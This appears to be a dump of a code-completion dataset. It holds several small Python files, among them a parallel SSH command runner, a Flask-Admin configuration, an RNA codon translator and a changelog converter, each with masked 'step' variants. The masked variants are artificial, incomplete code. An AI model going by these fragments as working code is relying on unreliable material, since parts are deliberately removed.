ping'.format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print('Server: {} : {}'.format(item['server'], item['commands']))\n continue\n print('Server: {}'.format(item['server']))\n for command in commands:\n if item['commands'][command][0] != '':\n if options.script:\n print('Output of Command: {}'.format(options.script))\n else:\n print('Output of Command: {}'.format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != '':\n print('Error occurred on command: {}'.format(command))\n print(item['commands'][command][1])\n print(\n '**************************************************************************'\n )\n",
"step-4": "import sgc\nimport multiprocessing as mp\nimport argparse\nimport os\nimport re\nparser = argparse.ArgumentParser(description=\n 'Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help=\n 'servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help=\n 'commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help=\n 'local script which need to execute on remote servers')\noptions = parser.parse_args()\nif os.path.getsize(options.file) == 0:\n print('Error: server list file is empty')\n exit(2)\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\nif not servers:\n print('Error: server list file is empty')\n exit(2)\ncommands = []\nif options.commands and re.match('[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n if not commands:\n print('Error: command list is empty')\n parser.print_help()\n exit(2)\nif options.script:\n commands = ['/tmp/' + os.path.basename(options.script)]\nqueue = mp.Queue()\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children():\n if not queue.empty():\n item = queue.get()\n if item['commands'] == 'Down':\n print('Server: {} : Unable to ping'.format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print('Server: {} : {}'.format(item['server'], item['commands']))\n continue\n print('Server: {}'.format(item['server']))\n for command in commands:\n if item['commands'][command][0] != '':\n if options.script:\n print('Output of Command: {}'.format(options.script))\n else:\n print('Output of Command: {}'.format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != '':\n print('Error occurred on command: {}'.format(command))\n print(item['commands'][command][1])\n print(\n '**************************************************************************'\n )\n",
"step-5": "import sgc\nimport multiprocessing as mp\n# import json\nimport argparse\nimport os\nimport re\n\n\n\n#Process argument passed to the script\nparser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help='servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help='commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')\n\noptions = parser.parse_args()\n\n#Exit if input file is zero\nif os.path.getsize(options.file) == 0:\n print(\"Error: server list file is empty\")\n exit(2)\n\n#Process the input file and store the server in list variable servers\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\n\n#Exit the script if the servers list is empty\nif not servers:\n print(\"Error: server list file is empty\")\n exit(2)\n\n#Process the commands passed into the script\ncommands = []\n\nif options.commands and re.match(r'[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n #Exit the script if command list is empty\n if not commands:\n print(\"Error: command list is empty\")\n parser.print_help()\n exit(2)\n\nif options.script:\n commands = ['/tmp/'+os.path.basename(options.script)]\n\n#servers = ['localhost', 'centos6web', 'fedora.kannan.lab', '127.0.0.1', '127.0.0.2', '127.0.0.3', '127.0.0.4',\n# '127.0.0.100', '127.0.0.200', '127.0.0.150', '127.0.0.10', '127.0.0.20', '127.0.0.30']\n# servers = ['centos6web', 'fedora.kannan.lab']\n# commands = ('sudo shutdown -h 0',)\n# commands = ('uptime', 'uname -a', 'sudo fdisk -l')\nqueue = mp.Queue()\ndef worker(server, commands):\n # print(mp.current_process().name)\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n\n # print(\"Connected to server {}\".format(server))\n # else:\n # print(\"Unable to connect to server {}\\n{}\".format(server, session.connection_error))\n if session.ping == 'Alive':\n session.connect()\n # print(session.connection)\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'] = \"Error: the script location {} not exists\".format(options.script)\n print(\"Error: the script location {} not exists\".format(options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = ('/tmp/'+file,)\n session.execute(('/bin/chmod a+x /tmp/'+file, ))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n\n queue.put(output)\n # if output != None:\n # print(\"Server {}\".format(server))\n # for key in output:\n # print(key, output[key])\n\n# pool = mp.Pool(processes=mp.cpu_count())\n# result = pool.map_async(worker, servers)\n# for item in result.get():\n# print(json.dumps(item, indent=4))\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children() :\n if not queue.empty():\n item = queue.get()\n\n if item['commands'] == 'Down':\n print(\"Server: {} : Unable to ping\".format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print(\"Server: {} : {}\".format(item['server'], item['commands']))\n continue\n\n print(\"Server: {}\".format(item['server']))\n for command in commands:\n if item['commands'][command][0] != \"\":\n if options.script:\n print(\"Output of Command: {}\".format(options.script))\n else:\n print(\"Output of Command: {}\".format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != \"\":\n print(\"Error occurred on command: {}\".format(command))\n print(item['commands'][command][1])\n print(\"**************************************************************************\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from flask_admin.contrib.sqla import ModelView
from flask_admin import Admin
from flask import abort
import flask_login
import logging
from .models import User, sendUserMail, db as userdb
from .box_models import Box, Image, db as boxdb
from .box_queue import BoxQueue
logger = logging.getLogger('labboxmain')
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, "Permission Denied")
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, "Permission Denied")
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
column_list = ["id", "name", "disable", "groupid", "email", "passtime", "quota", "use_quota", "password"]
column_descriptions = {
'password': "Password(Left empty for forgot or newly create, It will send email to whom)",
'passtime': "The time for manually changing password(0 = never)"
}
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning("[Admin] Create for " + model.email)
sendUserMail(model, "register")
return
if not model.password:
logger.warning("[Admin] Reset Password and sent to " + model.email)
sendUserMail(model, "forgetpass")
return
if not model.password.startswith("$6$"):
logger.warning("[Admin] Reset Password " + model.email)
model.setPassword(model.password)
admin = Admin()
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
|
normal
|
{
"blob_id": "3f86227afd60be560ac3d4ce2bee1f6cf74a744d",
"index": 3509,
"step-1": "<mask token>\n\n\nclass UserModel(AuthModel):\n <mask token>\n <mask token>\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\n<mask token>\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-3": "<mask token>\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-4": "from flask_admin.contrib.sqla import ModelView\nfrom flask_admin import Admin\nfrom flask import abort\nimport flask_login\nimport logging\nfrom .models import User, sendUserMail, db as userdb\nfrom .box_models import Box, Image, db as boxdb\nfrom .box_queue import BoxQueue\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-5": "from flask_admin.contrib.sqla import ModelView\nfrom flask_admin import Admin\nfrom flask import abort\nimport flask_login\nimport logging\nfrom .models import User, sendUserMail, db as userdb\nfrom .box_models import Box, Image, db as boxdb\nfrom .box_queue import BoxQueue\n\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, \"Permission Denied\")\n return False\n\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, \"Permission Denied\")\n return False\n\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = [\"id\", \"name\", \"disable\", \"groupid\", \"email\", \"passtime\", \"quota\", \"use_quota\", \"password\"]\n\n column_descriptions = {\n 'password': \"Password(Left empty for forgot or newly create, It will send email to whom)\",\n 'passtime': \"The time for manually changing password(0 = never)\"\n }\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning(\"[Admin] Create for \" + model.email)\n sendUserMail(model, \"register\")\n return\n if not model.password:\n logger.warning(\"[Admin] Reset Password and sent to \" + model.email)\n sendUserMail(model, \"forgetpass\")\n return\n if not model.password.startswith(\"$6$\"):\n logger.warning(\"[Admin] Reset Password \" + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-ids": [
2,
6,
7,
8,
9
]
}
|
[
2,
6,
7,
8,
9
] |
aminotable = [
['Ile' , 'AUU','AUC','AUA'], #0
['Leu' , 'CUU','CUC','CUA','CUG','UUA','UUG'], #1
['Val' , 'GUU','GUC','GUA','GUG'], #2
['Phe' , 'UUU','UUC'], #3
['Met' , 'AUG'], #4
['Cys' , 'UGU','UGC'], #5
['Ala' , 'GCU','GCC','GCA','GCG'], #6
['Gly', 'GGU', 'GGC', 'GGA', 'GGG'], #7
['Pro' , 'CCU', 'CCC', 'CCA', 'CCG'], #8
['Thr' , 'ACU', 'ACC', 'ACA', 'ACG'], #9
['Ser' , 'UCU', 'UCC', 'UCA', 'UCG', 'AGU', 'AGC'], #10
['Tyr' , 'UAU', 'UAC'], #11
['Trp' , 'UGG'], #12
['Gln' , 'CAA', 'CAG'], #13
['Asn' , 'AAU', 'AAC'], #14
['His' , 'CAU', 'CAC'], #15
['Glu' , 'GAA', 'GAG'], #16
['Asp' , 'GAU', 'GAC'], #17
['Lys', 'AAA', 'AAG'], #18
['Arg' , 'CGU', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'], #19
['Stop' , 'UAA', 'UAG', 'UGA'], #20
]
sequence = input("\nEnter RNA Sequence : ")
print('Original sequence: ',sequence,'\n')
n = 0
seqlength = len(sequence)
print('Amino Sequence: ')
while (n < seqlength):
codon = sequence[n:n+3]
for amino in aminotable:
for i in range(len(amino) - 1):
match = amino[i+1]
if (codon == match) :
print(amino[0], end = '-')
break
n += 3
print('\n\n\nEnd of program')
|
normal
|
{
"blob_id": "d5a31e53444e2efa2eb972f1152b6d3e37d5ab79",
"index": 5321,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Original sequence: ', sequence, '\\n')\n<mask token>\nprint('Amino Sequence: ')\nwhile n < seqlength:\n codon = sequence[n:n + 3]\n for amino in aminotable:\n for i in range(len(amino) - 1):\n match = amino[i + 1]\n if codon == match:\n print(amino[0], end='-')\n break\n n += 3\nprint(\"\"\"\n\n\nEnd of program\"\"\")\n",
"step-3": "aminotable = [['Ile', 'AUU', 'AUC', 'AUA'], ['Leu', 'CUU', 'CUC', 'CUA',\n 'CUG', 'UUA', 'UUG'], ['Val', 'GUU', 'GUC', 'GUA', 'GUG'], ['Phe',\n 'UUU', 'UUC'], ['Met', 'AUG'], ['Cys', 'UGU', 'UGC'], ['Ala', 'GCU',\n 'GCC', 'GCA', 'GCG'], ['Gly', 'GGU', 'GGC', 'GGA', 'GGG'], ['Pro',\n 'CCU', 'CCC', 'CCA', 'CCG'], ['Thr', 'ACU', 'ACC', 'ACA', 'ACG'], [\n 'Ser', 'UCU', 'UCC', 'UCA', 'UCG', 'AGU', 'AGC'], ['Tyr', 'UAU', 'UAC'],\n ['Trp', 'UGG'], ['Gln', 'CAA', 'CAG'], ['Asn', 'AAU', 'AAC'], ['His',\n 'CAU', 'CAC'], ['Glu', 'GAA', 'GAG'], ['Asp', 'GAU', 'GAC'], ['Lys',\n 'AAA', 'AAG'], ['Arg', 'CGU', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'], [\n 'Stop', 'UAA', 'UAG', 'UGA']]\nsequence = input(\"\"\"\nEnter RNA Sequence : \"\"\")\nprint('Original sequence: ', sequence, '\\n')\nn = 0\nseqlength = len(sequence)\nprint('Amino Sequence: ')\nwhile n < seqlength:\n codon = sequence[n:n + 3]\n for amino in aminotable:\n for i in range(len(amino) - 1):\n match = amino[i + 1]\n if codon == match:\n print(amino[0], end='-')\n break\n n += 3\nprint(\"\"\"\n\n\nEnd of program\"\"\")\n",
"step-4": "aminotable = [\r\n ['Ile' , 'AUU','AUC','AUA'], #0\r\n ['Leu' , 'CUU','CUC','CUA','CUG','UUA','UUG'], #1\r\n ['Val' , 'GUU','GUC','GUA','GUG'], #2\r\n ['Phe' , 'UUU','UUC'], #3\r\n ['Met' , 'AUG'], #4\r\n ['Cys' , 'UGU','UGC'], #5\r\n ['Ala' , 'GCU','GCC','GCA','GCG'], #6\r\n ['Gly', 'GGU', 'GGC', 'GGA', 'GGG'], #7\r\n ['Pro' , 'CCU', 'CCC', 'CCA', 'CCG'], #8\r\n ['Thr' , 'ACU', 'ACC', 'ACA', 'ACG'], #9\r\n ['Ser' , 'UCU', 'UCC', 'UCA', 'UCG', 'AGU', 'AGC'], #10\r\n ['Tyr' , 'UAU', 'UAC'], #11\r\n ['Trp' , 'UGG'], #12\r\n ['Gln' , 'CAA', 'CAG'], #13\r\n ['Asn' , 'AAU', 'AAC'], #14\r\n ['His' , 'CAU', 'CAC'], #15\r\n ['Glu' , 'GAA', 'GAG'], #16\r\n ['Asp' , 'GAU', 'GAC'], #17\r\n ['Lys', 'AAA', 'AAG'], #18\r\n ['Arg' , 'CGU', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'], #19\r\n ['Stop' , 'UAA', 'UAG', 'UGA'], #20\r\n]\r\n\r\nsequence = input(\"\\nEnter RNA Sequence : \")\r\n\r\nprint('Original sequence: ',sequence,'\\n')\r\n\r\nn = 0\r\nseqlength = len(sequence)\r\n\r\nprint('Amino Sequence: ')\r\n\r\nwhile (n < seqlength):\r\n codon = sequence[n:n+3]\r\n for amino in aminotable:\r\n for i in range(len(amino) - 1):\r\n match = amino[i+1]\r\n if (codon == match) :\r\n print(amino[0], end = '-')\r\n break\r\n n += 3\r\n\r\nprint('\\n\\n\\nEnd of program')\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from collections import namedtuple
from weakref import ref
l = list()
_l = list()
# Point = namedtuple('Point', ['x', 'y'])
class Point:
def __init__(self,x,y):
self.x = x
self.y = y
def callback(ref):
print ('__del__', ref)
for x in range(10):
p = Point(x,x**2)
t = ref(p,callback)
print(t)
l.append(t)
_l.append(p)
print(len(l),l)
print(len(_l),_l)
t = _l[6]
del t,_l[6]
print(len(_l),_l)
# print(len(l),l)
|
normal
|
{
"blob_id": "2542998c3a7decd6329856a31d8e9de56f82bae1",
"index": 3922,
"step-1": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print('__del__', ref)\n\n\n<mask token>\n",
"step-3": "<mask token>\nl = list()\n_l = list()\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print('__del__', ref)\n\n\nfor x in range(10):\n p = Point(x, x ** 2)\n t = ref(p, callback)\n print(t)\n l.append(t)\n _l.append(p)\nprint(len(l), l)\nprint(len(_l), _l)\nt = _l[6]\ndel t, _l[6]\nprint(len(_l), _l)\n",
"step-4": "from collections import namedtuple\nfrom weakref import ref\nl = list()\n_l = list()\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print('__del__', ref)\n\n\nfor x in range(10):\n p = Point(x, x ** 2)\n t = ref(p, callback)\n print(t)\n l.append(t)\n _l.append(p)\nprint(len(l), l)\nprint(len(_l), _l)\nt = _l[6]\ndel t, _l[6]\nprint(len(_l), _l)\n",
"step-5": "from collections import namedtuple\nfrom weakref import ref\n\nl = list()\n_l = list()\n\n# Point = namedtuple('Point', ['x', 'y'])\nclass Point:\n def __init__(self,x,y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print ('__del__', ref)\n\n\nfor x in range(10):\n p = Point(x,x**2)\n t = ref(p,callback)\n print(t)\n l.append(t)\n _l.append(p)\n\nprint(len(l),l)\nprint(len(_l),_l)\n\nt = _l[6]\ndel t,_l[6]\n\nprint(len(_l),_l)\n\n\n# print(len(l),l)",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('blog', '0005_auto_20200111_1513')]
operations = [migrations.AlterField(model_name='post', name='photo',
field=models.TextField(default='https://medium.com/'))]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('blog', '0005_auto_20200111_1513')]
operations = [migrations.AlterField(model_name='post', name='photo',
field=models.TextField(default='https://medium.com/'))]
<|reserved_special_token_1|>
# Generated by Django 3.0.1 on 2020-01-11 09:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_auto_20200111_1513'),
]
operations = [
migrations.AlterField(
model_name='post',
name='photo',
field=models.TextField(default='https://medium.com/'),
),
]
|
flexible
|
{
"blob_id": "8e8c72362dfb1587150aadaa6b8a0aeb77c3641a",
"index": 1516,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0005_auto_20200111_1513')]\n operations = [migrations.AlterField(model_name='post', name='photo',\n field=models.TextField(default='https://medium.com/'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0005_auto_20200111_1513')]\n operations = [migrations.AlterField(model_name='post', name='photo',\n field=models.TextField(default='https://medium.com/'))]\n",
"step-5": "# Generated by Django 3.0.1 on 2020-01-11 09:50\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0005_auto_20200111_1513'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='photo',\n field=models.TextField(default='https://medium.com/'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
#print(list(data))
|
normal
|
{
"blob_id": "3dd4b4d4241e588cf44230891f496bafb30c6153",
"index": 46,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(df.head())\n",
"step-3": "<mask token>\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n",
"step-4": "import requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n",
"step-5": "\n\nimport requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n#print(list(data))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
from datetime import datetime
import re
import sys
MONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'
'January|February|March|April|June|July|August|September|October|November|December')
re_entry_begin = re.compile(r'(?P<version>[\d.]+)[ :]*\(?(?P<date>\d\d\d\d-\d\d-\d\d|(?:'
+ MONTHS_REGEXP + r') \d\d, \d\d\d\d)?\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n'
# Missing from CHANGELOG (found in hg log), or not parseable easily
VERSION_DATES = {
'1.2.8': '2008-08-22',
'1.2.7': '2007-01-07',
'1.2.2': '2005-05-06',
'1.2.1': '2004-04-04',
'1.1.1': '2004-02-01',
'1.1': '2004-01-30',
'0.4': '2003-11-04',
'0.1': '2003-05-19',
}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith(r'\* *This Change Log was')
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
|
normal
|
{
"blob_id": "03677f02473019fcc6a40d91569a85be78ca0a87",
"index": 7179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-3": "<mask token>\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n 